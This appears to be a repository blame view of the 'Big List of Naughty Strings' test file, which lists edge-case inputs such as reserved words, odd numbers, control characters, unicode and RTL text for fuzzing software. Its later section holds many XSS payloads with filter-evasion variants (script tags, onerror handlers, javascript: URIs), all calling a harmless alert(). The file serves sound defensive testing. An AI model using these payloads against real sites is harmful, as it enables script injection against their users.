Ed Tanous | f927347 | 2017-02-28 16:05:13 -0800 | [diff] [blame] | 1 | # sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt |
| 2 | |
| 3 | # Reserved Strings |
| 4 | # |
| 5 | # Strings which may be used elsewhere in code |
| 6 | |
| 7 | undefined |
| 8 | undef |
| 9 | null |
| 10 | NULL |
| 11 | (null) |
| 12 | nil |
| 13 | NIL |
| 14 | true |
| 15 | false |
| 16 | True |
| 17 | False |
| 18 | TRUE |
| 19 | FALSE |
| 20 | None |
| 21 | hasOwnProperty |
| 22 | \ |
| 23 | \\ |
| 24 | |
| 25 | # Numeric Strings |
| 26 | # |
| 27 | # Strings which can be interpreted as numeric |
| 28 | |
| 29 | 0 |
| 30 | 1 |
| 31 | 1.00 |
| 32 | $1.00 |
| 33 | 1/2 |
| 34 | 1E2 |
| 35 | 1E02 |
| 36 | 1E+02 |
| 37 | -1 |
| 38 | -1.00 |
| 39 | -$1.00 |
| 40 | -1/2 |
| 41 | -1E2 |
| 42 | -1E02 |
| 43 | -1E+02 |
| 44 | 1/0 |
| 45 | 0/0 |
| 46 | -2147483648/-1 |
| 47 | -9223372036854775808/-1 |
| 48 | -0 |
| 49 | -0.0 |
| 50 | +0 |
| 51 | +0.0 |
| 52 | 0.00 |
| 53 | 0..0 |
| 54 | . |
| 55 | 0.0.0 |
| 56 | 0,00 |
| 57 | 0,,0 |
| 58 | , |
| 59 | 0,0,0 |
| 60 | 0.0/0 |
| 61 | 1.0/0.0 |
| 62 | 0.0/0.0 |
| 63 | 1,0/0,0 |
| 64 | 0,0/0,0 |
| 65 | --1 |
| 66 | - |
| 67 | -. |
| 68 | -, |
| 69 | 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 |
| 70 | NaN |
| 71 | Infinity |
| 72 | -Infinity |
| 73 | INF |
| 74 | 1#INF |
| 75 | -1#IND |
| 76 | 1#QNAN |
| 77 | 1#SNAN |
| 78 | 1#IND |
| 79 | 0x0 |
| 80 | 0xffffffff |
| 81 | 0xffffffffffffffff |
| 82 | 0xabad1dea |
| 83 | 123456789012345678901234567890123456789 |
| 84 | 1,000.00 |
| 85 | 1 000.00 |
| 86 | 1'000.00 |
| 87 | 1,000,000.00 |
| 88 | 1 000 000.00 |
| 89 | 1'000'000.00 |
| 90 | 1.000,00 |
| 91 | 1 000,00 |
| 92 | 1'000,00 |
| 93 | 1.000.000,00 |
| 94 | 1 000 000,00 |
| 95 | 1'000'000,00 |
| 96 | 01000 |
| 97 | 08 |
| 98 | 09 |
| 99 | 2.2250738585072011e-308 |
| 100 | |
| 101 | # Special Characters |
| 102 | # |
| 103 | # ASCII punctuation. All of these characters may need to be escaped in some |
| 104 | # contexts. Divided into three groups based on (US-layout) keyboard position. |
| 105 | |
| 106 | ,./;'[]\-= |
| 107 | <>?:"{}|_+ |
| 108 | !@#$%^&*()`~ |
| 109 | |
| 110 | # Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, |
| 111 | # and U+007F (DEL) |
| 112 | # Often forbidden to appear in various text-based file formats (e.g. XML), |
| 113 | # or reused for internal delimiters on the theory that they should never |
| 114 | # appear in input. |
| 115 | # The next line may appear to be blank or mojibake in some viewers. |
| 116 | |
| 117 | |
| 118 | # Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. |
| 119 | # Commonly misinterpreted as additional graphic characters. |
| 120 | # The next line may appear to be blank, mojibake, or dingbats in some viewers. |
| 121 | |
| 122 | |
| 123 | # Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode |
| 124 | # version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), |
| 125 | # and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often |
| 126 | # treated as whitespace in some contexts. |
| 127 | # This file unfortunately cannot express strings containing |
| 128 | # U+0000, U+000A, or U+000D (NUL, LF, CR). |
| 129 | # The next line may appear to be blank or mojibake in some viewers. |
| 130 | # The next line may be flagged for "trailing whitespace" in some viewers. |
| 131 |
|
| 132 | |
| 133 | # Unicode additional control characters: all of the characters with |
| 134 | # general category Cf (in Unicode 8.0.0). |
| 135 | # The next line may appear to be blank or mojibake in some viewers. |
| 136 | |
| 137 | |
| 138 | # "Byte order marks", U+FEFF and U+FFFE, each on its own line. |
| 139 | # The next two lines may appear to be blank or mojibake in some viewers. |
| 140 | |
| 141 | |
| 142 | |
| 143 | # Unicode Symbols |
| 144 | # |
| 145 | # Strings which contain common unicode symbols (e.g. smart quotes) |
| 146 | |
| 147 | Ω≈ç√∫˜µ≤≥÷ |
| 148 | åß∂ƒ©˙∆˚¬…æ |
| 149 | œ∑´®†¥¨ˆøπ“‘ |
| 150 | ¡™£¢∞§¶•ªº–≠ |
| 151 | ¸˛Ç◊ı˜Â¯˘¿ |
| 152 | ÅÍÎÏ˝ÓÔÒÚÆ☃ |
| 153 | Œ„´‰ˇÁ¨ˆØ∏”’ |
| 154 | `⁄€‹›fifl‡°·‚—± |
| 155 | ⅛⅜⅝⅞ |
| 156 | ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя |
| 157 | ٠١٢٣٤٥٦٧٨٩ |
| 158 | |
| 159 | # Unicode Subscript/Superscript/Accents |
| 160 | # |
| 161 | # Strings which contain unicode subscripts/superscripts; can cause rendering issues |
| 162 | |
| 163 | ⁰⁴⁵ |
| 164 | ₀₁₂ |
| 165 | ⁰⁴⁵₀₁₂ |
| 166 | ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ |
| 167 | |
| 168 | # Quotation Marks |
| 169 | # |
| 170 | # Strings which contain misplaced quotation marks; can cause encoding errors |
| 171 | |
| 172 | ' |
| 173 | " |
| 174 | '' |
| 175 | "" |
| 176 | '"' |
| 177 | "''''"'" |
| 178 | "'"'"''''" |
| 179 | <foo val=“bar” /> |
| 180 | <foo val=“bar” /> |
| 181 | <foo val=”bar“ /> |
| 182 | <foo val=`bar' /> |
| 183 | |
| 184 | # Two-Byte Characters |
| 185 | # |
| 186 | # Strings which contain two-byte characters; can cause rendering issues or character-length issues |
| 187 | |
| 188 | 田中さんにあげて下さい |
| 189 | パーティーへ行かないか |
| 190 | 和製漢語 |
| 191 | 部落格 |
| 192 | 사회과학원 어학연구소 |
| 193 | 찦차를 타고 온 펲시맨과 쑛다리 똠방각하 |
| 194 | 社會科學院語學研究所 |
| 195 | 울란바토르 |
| 196 | 𠜎𠜱𠝹𠱓𠱸𠲖𠳏 |
| 197 | |
| 198 | # Changing length when lowercased |
| 199 | # |
| 200 | # Characters which increase in length (2 to 3 bytes) when lowercased |
| 201 | # Credit: https://twitter.com/jifa/status/625776454479970304 |
| 202 | |
| 203 | Ⱥ |
| 204 | Ⱦ |
| 205 | |
| 206 | # Japanese Emoticons |
| 207 | # |
| 208 | # Strings which consist of Japanese-style emoticons which are popular on the web |
| 209 | |
| 210 | ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ |
| 211 | (。◕ ∀ ◕。) |
| 212 | `ィ(´∀`∩ |
| 213 | __ロ(,_,*) |
| 214 | ・( ̄∀ ̄)・:*: |
| 215 | ゚・✿ヾ╲(。◕‿◕。)╱✿・゚ |
| 216 | ,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ |
| 217 | (╯°□°)╯︵ ┻━┻) |
| 218 | (ノಥ益ಥ)ノ ┻━┻ |
| 219 | ┬─┬ノ( º _ ºノ) |
| 220 | ( ͡° ͜ʖ ͡°) |
| 221 | |
| 222 | # Emoji |
| 223 | # |
| 224 | # Strings which contain Emoji; these should behave the same as two-byte characters, but do not always |
| 225 | |
| 226 | 😍 |
| 227 | 👩🏽 |
| 228 | 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 |
| 229 | 🐵 🙈 🙉 🙊 |
| 230 | ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 |
| 231 | ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 |
| 232 | 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 |
| 233 | 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 |
| 234 | |
| 235 | # Regional Indicator Symbols |
| 236 | # |
| 237 | # Regional Indicator Symbols can be displayed differently across |
| 238 | # fonts, and have a number of special behaviors |
| 239 | |
| 240 | 🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸 |
| 241 | 🇺🇸🇷🇺🇸🇦🇫🇦🇲 |
| 242 | 🇺🇸🇷🇺🇸🇦 |
| 243 | |
| 244 | # Unicode Numbers |
| 245 | # |
| 246 | # Strings which contain unicode numbers; if the code is localized, it should see the input as numeric |
| 247 | |
| 248 | 123 |
| 249 | ١٢٣ |
| 250 | |
| 251 | # Right-To-Left Strings |
| 252 | # |
| 253 | # Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) |
| 254 | |
| 255 | ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. |
| 256 | בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ |
| 257 | הָיְתָהtestالصفحات التّحول |
| 258 | ﷽ |
| 259 | ﷺ |
| 260 | مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، |
| 261 | |
| 262 | # Trick Unicode |
| 263 | # |
| 264 | # Strings which contain unicode with unusual properties (e.g. right-to-left override) (cf. http://www.unicode.org/charts/PDF/U2000.pdf) |
| 265 | |
| 266 | test |
| 267 | test |
| 268 |
test
|
| 269 | testtest |
| 270 | test |
| 271 | |
| 272 | # Zalgo Text |
| 273 | # |
| 274 | # Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) |
| 275 | |
| 276 | Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ |
| 277 | ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ |
| 278 | ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ |
| 279 | ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ |
| 280 | Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ |
| 281 | |
| 282 | # Unicode Upsidedown |
| 283 | # |
| 284 | # Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com) |
| 285 | |
| 286 | ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ |
| 287 | 00˙Ɩ$- |
| 288 | |
| 289 | # Unicode font |
| 290 | # |
| 291 | # Strings which contain bold/italic/etc. versions of normal characters |
| 292 | |
| 293 | The quick brown fox jumps over the lazy dog |
| 294 | 𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠 |
| 295 | 𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌 |
| 296 | 𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈 |
| 297 | 𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰 |
| 298 | 𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘 |
| 299 | 𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐 |
| 300 | ⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢ |
| 301 | |
| 302 | # Script Injection |
| 303 | # |
| 304 | # Strings which attempt to invoke a benign script injection; shows vulnerability to XSS |
| 305 | |
| 306 | <script>alert(123)</script> |
| 307 | <script>alert('123');</script> |
| 308 | <img src=x onerror=alert(123) /> |
| 309 | <svg><script>123<1>alert(123)</script> |
| 310 | "><script>alert(123)</script> |
| 311 | '><script>alert(123)</script> |
| 312 | ><script>alert(123)</script> |
| 313 | </script><script>alert(123)</script> |
| 314 | < / script >< script >alert(123)< / script > |
| 315 | onfocus=JaVaSCript:alert(123) autofocus |
| 316 | " onfocus=JaVaSCript:alert(123) autofocus |
| 317 | ' onfocus=JaVaSCript:alert(123) autofocus |
| 318 | <script>alert(123)</script> |
| 319 | <sc<script>ript>alert(123)</sc</script>ript> |
| 320 | --><script>alert(123)</script> |
| 321 | ";alert(123);t=" |
| 322 | ';alert(123);t=' |
| 323 | JavaSCript:alert(123) |
| 324 | ;alert(123); |
| 325 | src=JaVaSCript:prompt(132) |
| 326 | "><script>alert(123);</script x=" |
| 327 | '><script>alert(123);</script x=' |
| 328 | ><script>alert(123);</script x= |
| 329 | " autofocus onkeyup="javascript:alert(123) |
| 330 | ' autofocus onkeyup='javascript:alert(123) |
| 331 | <script\x20type="text/javascript">javascript:alert(1);</script> |
| 332 | <script\x3Etype="text/javascript">javascript:alert(1);</script> |
| 333 | <script\x0Dtype="text/javascript">javascript:alert(1);</script> |
| 334 | <script\x09type="text/javascript">javascript:alert(1);</script> |
| 335 | <script\x0Ctype="text/javascript">javascript:alert(1);</script> |
| 336 | <script\x2Ftype="text/javascript">javascript:alert(1);</script> |
| 337 | <script\x0Atype="text/javascript">javascript:alert(1);</script> |
| 338 | '`"><\x3Cscript>javascript:alert(1)</script> |
| 339 | '`"><\x00script>javascript:alert(1)</script> |
| 340 | ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF |
| 341 | ABC<div style="x:expression\x5C(javascript:alert(1)">DEF |
| 342 | ABC<div style="x:expression\x00(javascript:alert(1)">DEF |
| 343 | ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF |
| 344 | ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF |
| 345 | ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF |
| 346 | ABC<div style="x:\x09expression(javascript:alert(1)">DEF |
| 347 | ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF |
| 348 | ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF |
| 349 | ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF |
| 350 | ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF |
| 351 | ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF |
| 352 | ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF |
| 353 | ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF |
| 354 | ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF |
| 355 | ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF |
| 356 | ABC<div style="x:\x20expression(javascript:alert(1)">DEF |
| 357 | ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF |
| 358 | ABC<div style="x:\x00expression(javascript:alert(1)">DEF |
| 359 | ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF |
| 360 | ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF |
| 361 | ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF |
| 362 | ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF |
| 363 | ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF |
| 364 | ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF |
| 365 | ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF |
| 366 | ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF |
| 367 | <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 368 | <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 369 | <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 370 | <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 371 | <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 372 | <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 373 | <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 374 | <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 375 | <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 376 | <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 377 | <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 378 | <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 379 | <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 380 | <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 381 | <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 382 | <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 383 | <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 384 | <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 385 | <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 386 | <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 387 | <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 388 | <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 389 | <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 390 | <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 391 | <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 392 | <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 393 | <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 394 | <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 395 | <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 396 | <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 397 | <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 398 | <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 399 | <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 400 | <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 401 | <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 402 | <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 403 | <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 404 | <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 405 | <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 406 | <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 407 | <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 408 | <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 409 | <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 410 | <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 411 | <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 412 | <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 413 | <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 414 | <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 415 | <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 416 | <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 417 | <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 418 | <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 419 | <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> |
| 420 | <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> |
| 421 | <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> |
| 422 | <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> |
| 423 | <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> |
| 424 | `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> |
| 425 | `"'><img src=xxx:x \x22onerror=javascript:alert(1)> |
| 426 | `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> |
| 427 | `"'><img src=xxx:x \x0Donerror=javascript:alert(1)> |
| 428 | `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> |
| 429 | `"'><img src=xxx:x \x09onerror=javascript:alert(1)> |
| 430 | `"'><img src=xxx:x \x0Conerror=javascript:alert(1)> |
| 431 | `"'><img src=xxx:x \x00onerror=javascript:alert(1)> |
| 432 | `"'><img src=xxx:x \x27onerror=javascript:alert(1)> |
| 433 | `"'><img src=xxx:x \x20onerror=javascript:alert(1)> |
| 434 | "`'><script>\x3Bjavascript:alert(1)</script> |
| 435 | "`'><script>\x0Djavascript:alert(1)</script> |
| 436 | "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> |
| 437 | "`'><script>\xE2\x80\x81javascript:alert(1)</script> |
| 438 | "`'><script>\xE2\x80\x84javascript:alert(1)</script> |
| 439 | "`'><script>\xE3\x80\x80javascript:alert(1)</script> |
| 440 | "`'><script>\x09javascript:alert(1)</script> |
| 441 | "`'><script>\xE2\x80\x89javascript:alert(1)</script> |
| 442 | "`'><script>\xE2\x80\x85javascript:alert(1)</script> |
| 443 | "`'><script>\xE2\x80\x88javascript:alert(1)</script> |
| 444 | "`'><script>\x00javascript:alert(1)</script> |
| 445 | "`'><script>\xE2\x80\xA8javascript:alert(1)</script> |
| 446 | "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> |
| 447 | "`'><script>\xE1\x9A\x80javascript:alert(1)</script> |
| 448 | "`'><script>\x0Cjavascript:alert(1)</script> |
| 449 | "`'><script>\x2Bjavascript:alert(1)</script> |
| 450 | "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> |
| 451 | "`'><script>-javascript:alert(1)</script> |
| 452 | "`'><script>\x0Ajavascript:alert(1)</script> |
| 453 | "`'><script>\xE2\x80\xAFjavascript:alert(1)</script> |
| 454 | "`'><script>\x7Ejavascript:alert(1)</script> |
| 455 | "`'><script>\xE2\x80\x87javascript:alert(1)</script> |
| 456 | "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> |
| 457 | "`'><script>\xE2\x80\xA9javascript:alert(1)</script> |
| 458 | "`'><script>\xC2\x85javascript:alert(1)</script> |
| 459 | "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> |
| 460 | "`'><script>\xE2\x80\x83javascript:alert(1)</script> |
| 461 | "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> |
| 462 | "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> |
| 463 | "`'><script>\xE2\x80\x80javascript:alert(1)</script> |
| 464 | "`'><script>\x21javascript:alert(1)</script> |
| 465 | "`'><script>\xE2\x80\x82javascript:alert(1)</script> |
| 466 | "`'><script>\xE2\x80\x86javascript:alert(1)</script> |
| 467 | "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> |
| 468 | "`'><script>\x0Bjavascript:alert(1)</script> |
| 469 | "`'><script>\x20javascript:alert(1)</script> |
| 470 | "`'><script>\xC2\xA0javascript:alert(1)</script> |
| 471 | <img \x00src=x onerror="alert(1)"> |
| 472 | <img \x47src=x onerror="javascript:alert(1)"> |
| 473 | <img \x11src=x onerror="javascript:alert(1)"> |
| 474 | <img \x12src=x onerror="javascript:alert(1)"> |
| 475 | <img\x47src=x onerror="javascript:alert(1)"> |
| 476 | <img\x10src=x onerror="javascript:alert(1)"> |
| 477 | <img\x13src=x onerror="javascript:alert(1)"> |
| 478 | <img\x32src=x onerror="javascript:alert(1)"> |
| 479 | <img\x47src=x onerror="javascript:alert(1)"> |
| 480 | <img\x11src=x onerror="javascript:alert(1)"> |
| 481 | <img \x47src=x onerror="javascript:alert(1)"> |
| 482 | <img \x34src=x onerror="javascript:alert(1)"> |
| 483 | <img \x39src=x onerror="javascript:alert(1)"> |
| 484 | <img \x00src=x onerror="javascript:alert(1)"> |
